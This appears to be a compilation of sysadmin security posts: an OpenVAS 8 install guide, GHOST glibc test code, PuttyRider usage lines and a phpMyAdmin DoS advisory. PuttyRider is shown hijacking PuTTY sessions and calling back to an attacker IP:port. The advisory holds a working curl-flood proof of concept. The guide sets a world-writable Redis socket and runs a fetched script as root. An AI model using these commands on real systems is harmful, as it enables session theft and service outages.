Install OpenVAS 8 on Debian 8 Jessie

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

You can find all source packages for OpenVAS here.

First, prepare the system for OpenVAS:

sudo apt-get update
sudo apt-get install build-essential cmake bison flex libpcap-dev pkg-config libglib2.0-dev libgpgme11-dev uuid-dev \
sqlfairy xmltoman doxygen libssh-dev libksba-dev libldap2-dev \
libsqlite3-dev libmicrohttpd-dev libxml2-dev libxslt1-dev \
xsltproc clang rsync rpm nsis alien sqlite3 libhiredis-dev libgcrypt11-dev libgnutls28-dev redis-server texlive-latex-base

(Package list edited following Thomas Frederiksen's suggestion.)

Download the sources:

wget http://wald.intevation.org/frs/download.php/2067/openvas-libraries-8.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/2071/openvas-scanner-5.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/2075/openvas-manager-6.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/2079/greenbone-security-assistant-6.0.3.tar.gz
wget http://wald.intevation.org/frs/download.php/1987/openvas-cli-1.4.0.tar.gz

Extract the packages:

tar xvf greenbone-security-assistant-6.0.3.tar.gz
tar xvf openvas-libraries-8.0.3.tar.gz
tar xvf openvas-scanner-5.0.3.tar.gz
tar xvf openvas-manager-6.0.3.tar.gz
tar xvf openvas-cli-1.4.0.tar.gz

Compile and install the sources:

cd openvas-libraries-8.0.3
cmake .
make
make doc
sudo make install
cd ..

cd openvas-manager-6.0.3/
cmake .
make
make doc
sudo make install
cd ..

cd openvas-scanner-5.0.3/
cmake .
make
make doc
sudo make install
cd ..

cd openvas-cli-1.4.0/
cmake .
make
make doc
sudo make install
cd ..

cd greenbone-security-assistant-6.0.3/
cmake .
make
make doc
sudo make install

Configuration step:

sudo ldconfig

cd ~ && wget --no-check-certificate https://svn.wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup &&
chmod +x openvas-check-setup && sudo ./openvas-check-setup --v8

# Create openvas certificates:
sudo openvas-mkcert

# NVT feed:
sudo openvas-nvt-sync

# SCAP feed:
sudo openvas-scapdata-sync

# CERT feed:
sudo openvas-certdata-sync

# Generate client certificates:
sudo openvas-mkcert-client -n -i

# Signature checking of NVTs:

sudo apt-get install gnupg
wget http://www.openvas.org/OpenVAS_TI.asc
sudo gpg --homedir=/usr/local/etc/openvas/gnupg --gen-key
sudo gpg --homedir=/usr/local/etc/openvas/gnupg --import OpenVAS_TI.asc
sudo gpg --homedir=/usr/local/etc/openvas/gnupg --lsign-key 48DB4530

To help generate the random bytes the key generation needs, run this in another shell:

sudo dd if=/dev/zero of=/tmp/500m.tmp bs=500M count=5

or install the haveged daemon:

sudo apt-get install haveged

# enable sign check:

echo "nasl_no_signature_check = no" >> /usr/local/etc/openvas/openvassd.conf

# Update portnames:

wget http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xml
openvas-portnames-update service-names-port-numbers.xml
rm service-names-port-numbers.xml

# Create admin password:

sudo openvasmd --create-user=adminuser --role=Admin

Write down the generated password.

# Set passwd policy
sudo vim /usr/local/etc/openvas/pwpolicy.conf

# install nmap 5.51:

wget http://nmap.org/dist/nmap-5.51.6.tgz &&
tar xvf nmap-5.51.6.tgz &&
cd nmap-5.51.6 &&
./configure &&
make &&
make install

# Start OpenVAS Scanner
sudo openvassd

# Initialize the Database
sudo openvasmd --rebuild --progress

# Launch OpenVAS Scanner as root
openvassd

# Launch OpenVAS Manager daemon
openvasmd

# Launch OpenVAS Greenbone Security Assistant

gsad

Configure redis-server, starting from the stock redis.conf (http://download.redis.io/redis-stable/redis.conf). Changes in redis.conf:

unixsocket /tmp/redis.sock
unixsocketperm 777
dir /var/dump # create and chmod with root

Comment out the lines below:

#repl-diskless-sync no
#repl-diskless-sync-delay 5
# repl-ping-slave-period 10

Connect to the web interface with “adminuser” and the password you wrote down:

https://localhost
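Two of the manual edits above deserve a check once the install is done: the nasl_no_signature_check line appended to openvassd.conf (signature checking is only enforced if the effective value is "no"), and the unixsocketperm 777 in redis.conf, which makes the scanner's Redis socket readable and writable by every local user (770 with a shared group is the tighter setting). The C program below is an added example, not part of the post or of OpenVAS: it parses both file formats (openvassd.conf's "key = value" and redis.conf's "key value") from constructed in-memory samples using the keys and paths from the steps above, and it assumes that when a key appears more than once, the last uncommented line is the effective one.

```c
/* Added example (not from the original post or from OpenVAS): checks the two
 * hand-edited settings from the install steps. Samples are constructed inline
 * so the program runs offline. Assumption: the last uncommented occurrence of
 * a key is the effective one. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Copy the value of the last uncommented line starting with `key` into `out`
 * (leading '=' and surrounding whitespace removed). Returns 1 if found, else 0. */
static int last_setting(const char *text, const char *key, char *out, size_t outlen)
{
    int found = 0;
    size_t klen = strlen(key);
    const char *line = text;

    while (*line) {
        const char *end = strchr(line, '\n');
        size_t n = end ? (size_t)(end - line) : strlen(line);
        const char *p = line;

        while (p < line + n && isspace((unsigned char)*p)) p++;   /* skip indent */
        if (*p != '#' && strncmp(p, key, klen) == 0) {
            const char *v = p + klen;
            /* require the key to end here (so "unixsocket" != "unixsocketperm") */
            if (v == line + n || isspace((unsigned char)*v) || *v == '=') {
                const char *e = line + n;
                size_t vl;
                while (v < line + n && (isspace((unsigned char)*v) || *v == '=')) v++;
                while (e > v && isspace((unsigned char)e[-1])) e--;
                vl = (size_t)(e - v);
                if (vl >= outlen) vl = outlen - 1;
                memcpy(out, v, vl);
                out[vl] = '\0';
                found = 1;
            }
        }
        if (!end) break;
        line = end + 1;
    }
    return found;
}

/* openvassd.conf: NVT signature checking is enforced only when the effective
 * nasl_no_signature_check value is "no". Returns 1 if enforced, 0 otherwise. */
int nasl_signature_check_enforced(const char *conf)
{
    char v[64];
    return last_setting(conf, "nasl_no_signature_check", v, sizeof v)
           && strcmp(v, "no") == 0;
}

/* redis.conf: reject a unixsocketperm whose "other" octal digit is non-zero,
 * i.e. a socket every local user can talk to. Returns 1 if acceptable. */
int redis_socket_perm_ok(const char *conf)
{
    char v[16];
    size_t l;
    if (!last_setting(conf, "unixsocketperm", v, sizeof v)) return 0;
    l = strlen(v);
    return l >= 3 && l <= 4 && v[l - 1] == '0';
}

/* Constructed samples: the first mirrors a stale "yes" followed by the line
 * the post appends; the second is the redis.conf fragment from the post. */
static const char SAMPLE_OPENVASSD_CONF[] =
    "# constructed sample of /usr/local/etc/openvas/openvassd.conf\n"
    "nasl_no_signature_check = yes\n"
    "nasl_no_signature_check = no\n";
static const char SAMPLE_REDIS_CONF_POST[] =
    "unixsocket /tmp/redis.sock\n"
    "unixsocketperm 777\n"
    "dir /var/dump\n";
static const char SAMPLE_REDIS_CONF_TIGHT[] =
    "unixsocket /tmp/redis.sock\n"
    "unixsocketperm 770\n";

int main(void)
{
    printf("NVT signature check enforced: %s\n",
           nasl_signature_check_enforced(SAMPLE_OPENVASSD_CONF) ? "yes" : "NO");
    printf("redis socket perm (post's 777) acceptable: %s\n",
           redis_socket_perm_ok(SAMPLE_REDIS_CONF_POST) ? "yes" : "NO");
    printf("redis socket perm (770) acceptable: %s\n",
           redis_socket_perm_ok(SAMPLE_REDIS_CONF_TIGHT) ? "yes" : "NO");
    return 0;
}
```

To run it against the real files, read /usr/local/etc/openvas/openvassd.conf and the redis.conf you edited into a buffer and pass that string to the two functions instead of the samples.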

GHOST glibc based vulnerability in Linux systems

Researchers for Redwood City, Calif.-based security vendor Qualys Inc. discovered the vulnerability, which is officially labeled CVE-2015-0235, but has been nicknamed GHOST because it can be triggered by the DNS resolver function gethostbyname. This function translates a hostname to an IP address. The flaw, first reported by Threatpost, has been confirmed in Linux systems using GNU C Library (glibc) versions 2.2 and newer, which includes all glibc versions released since Nov. 10, 2000.

Qualys has categorized this as a critical vulnerability due to the vast number of affected systems, and because attackers can exploit the flaw remotely to gain control of a system without having any prior knowledge of system credentials.

“GHOST poses a remote code execution risk that makes it incredibly easy for an attacker to exploit a machine,” said Wolfgang Kandek, chief technical officer for Qualys. “For example, an attacker could send a simple email on a Linux-based system and automatically get complete access to that machine.”


How to test for the GHOST vulnerability?

$ wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
$ gcc GHOST.c -o GHOST
$ ./GHOST
[prints "vulnerable" or "not vulnerable"]

Note: Reboot your system after applying patches for this vulnerability.
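The program below is an added example, not the Qualys GHOST.c the post links to, though it uses the same canary technique. It hands gethostbyname_r() a buffer sized so that a vulnerable glibc's miscalculated space requirement fits exactly, then checks whether the bytes immediately after the buffer were overwritten; a fixed glibc counts the extra alias pointer, sees the buffer is too small and returns ERANGE without writing. The all-digit host name keeps the call on the numeric-parse path, so no DNS query leaves the machine. The function name ghost_check and its return codes are this example's own.

```c
/* Added example (not the Qualys GHOST.c from the post): self-contained check
 * for CVE-2015-0235 using a canary placed right after the buffer that
 * gethostbyname_r() is allowed to use. */
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

#define CANARY "in_the_coal_mine"

/* Returns 1 if this glibc is vulnerable (canary overwritten), 0 if it is fixed
 * (ERANGE returned, canary intact), -1 if inconclusive (e.g. a libc that does
 * not take glibc's digits-and-dots path at all). */
int ghost_check(void)
{
    /* The canary sits immediately after the 1024-byte buffer we hand to glibc.
     * A vulnerable __nss_hostname_digits_dots() under-counts the space it needs
     * by one char pointer and writes past the buffer into the canary. */
    struct {
        char buffer[1024];
        char canary[sizeof(CANARY)];
    } temp = { "buffer", CANARY };

    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    int retval;

    /* Choose the name length so the (miscalculated) size_needed equals the
     * buffer size exactly: 16 bytes for the address, two char* for the
     * address-pointer array, one NUL. The missing alias pointer is what a
     * vulnerable glibc then writes beyond the buffer. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];
    memset(name, '0', len);   /* all digits: numeric-parse path, no DNS traffic */
    name[len] = '\0';

    retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer),
                             &result, &herrno);

    if (strcmp(temp.canary, CANARY) != 0)
        return 1;             /* canary clobbered: the overflow happened */
    if (retval == ERANGE)
        return 0;             /* glibc refused the undersized buffer: fixed */
    return -1;
}

int main(void)
{
    int r = ghost_check();
    puts(r == 1 ? "vulnerable" : r == 0 ? "not vulnerable" : "inconclusive");
    return r == 1 ? 2 : 0;
}
```

Compile with `gcc ghost_check.c -o ghost_check` and run it on each host; a non-zero exit status marks a vulnerable glibc, which is convenient for fleet-wide checks from a configuration-management run. Remember that a patched library only takes effect for processes started after the update, hence the reboot advice above.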

How to Patch?

On Debian and Ubuntu systems:

$ sudo apt-get upgrade

On CentOS, Red Hat and Oracle Unbreakable Linux systems:

$ yum update

The PuttyRider tool hijacks PuTTY sessions in order to sniff the conversation and inject Linux commands.

PuttyRider targets the sysadmin tool PuTTY. This tiny utility hijacks PuTTY sessions and injects code into open sessions.

Usage:

List existing PuTTY processes and their status (injected / not injected):

PuttyRider.exe -l

Inject the DLL into the first putty.exe found and initiate a reverse connection from the DLL to my IP:Port, then exit PuttyRider.exe:

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in the background and wait for new PuTTY processes. Inject into any new putty.exe and write all conversations to local files:

PuttyRider.exe -w -f

Eject PuttyRider.dll from all PuTTY processes where it is already injected. (Don’t forget to kill PuttyRider.exe if it is running in -w mode, otherwise it will reinject.)

PuttyRider.exe -x

Download, code, details here

phpMyAdmin Denial of Service Vulnerability

A vulnerability present in phpMyAdmin 4.0.x before 4.0.10.7, 4.1.x before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to cause a denial of service (DoS, resource consumption) via a long password. CVE-2014-9218 was assigned.

December 3, 2014: a phpMyAdmin update and the security advisory are published.
=============
Proof of Concept:
=============
*1 - Create the payload.*
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload
*2 - Performing the Denial of Service attack.*
$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
=============
Authors:
=============
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============
References:
=============
* http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php